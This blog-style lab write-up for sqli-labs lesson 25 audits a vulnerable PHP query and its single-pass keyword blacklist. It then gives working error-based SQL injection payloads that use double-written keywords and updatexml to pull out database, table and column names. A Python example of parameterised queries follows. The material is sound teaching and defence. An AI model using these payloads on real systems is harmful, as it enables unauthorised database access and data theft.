
sqli-labs25

2022-06-21 05:54:00 ter_ ret


1. Code audit

1. This is the line where user input reaches the database. From it you can immediately read off the injection point (`$id`) and the quoting style that has to be closed (single quotes):

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

2. The blacklist function strips `and` and `or` with a regular expression; the `i` modifier makes the match case-insensitive. Note that each keyword is removed in a single pass, which is what makes it bypassable.

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)

    return $id;
}

2. SQL injection

1. Get the database name

Here we bypass the filter by double writing. Because the filter only runs once, the inner `and` of `aandnd` is stripped and the surrounding characters collapse into a single `and`, which is what the query then sees.

?id=1' aandnd updatexml(1,concat(0x7e,(select database()),0x7e),1)--+


2. Get the tables

Note that `information_schema` itself contains `or`, so it must also be double-written as `infoorrmation_schema`; otherwise the filter turns it into `infmation_schema` and the query fails.

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),0x7e),1)--+


3. Get the columns

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(column_name)from infoorrmation_schema.columns where table_name='users'),0x7e),1)--+
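As an added example (not part of the original writeup), the Python below reproduces the lab's single-pass blacklist to show why `aandnd` survives as `and`, then shows two defender-side responses: re-applying the filter until the input stops changing (which closes only this double-write trick, and still mangles legitimate data such as "Andrew"), and the real fix, binding `id` as a query parameter so it can never become SQL. The in-memory SQLite table and the row `(1, 'Dumb')` are constructed here to mirror the lab's `users` table.

```python
import re
import sqlite3


def blacklist(id_value: str) -> str:
    """Reproduce the lab filter: strip 'or' then 'and' once each, case-insensitively."""
    id_value = re.sub(r"or", "", id_value, flags=re.IGNORECASE)
    id_value = re.sub(r"and", "", id_value, flags=re.IGNORECASE)
    return id_value


def strip_until_stable(id_value: str) -> str:
    """Re-run the filter until a pass changes nothing.

    This stops 'aandnd' from reassembling into 'and' after a single pass,
    but keyword stripping remains a weak control: it still rewrites
    legitimate values and only defends against the keywords it knows.
    """
    while True:
        stripped = blacklist(id_value)
        if stripped == id_value:
            return stripped
        id_value = stripped


def lookup_user(id_value: str):
    """Parameterised query: the driver binds id_value as data, not SQL.

    Uses a constructed in-memory SQLite table standing in for the lab's
    'users' table; id is TEXT to match the lab's quoted comparison id='$id'.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, username TEXT)")
    conn.execute("INSERT INTO users VALUES ('1', 'Dumb')")
    row = conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 1", (id_value,)
    ).fetchone()
    conn.close()
    return row


if __name__ == "__main__":
    print(blacklist("aandnd"))                  # single pass leaves 'and'
    print(blacklist("infoorrmation_schema"))    # single pass leaves 'information_schema'
    print(strip_until_stable("aandnd"))         # repeated passes leave ''
    print(lookup_user("1"))                     # ('1', 'Dumb')
    print(lookup_user("1' aandnd 1=1--"))       # None: the whole string is compared as data
```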


Copyright notice
This article was written by [ter_ ret]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/172/202206210548359587.html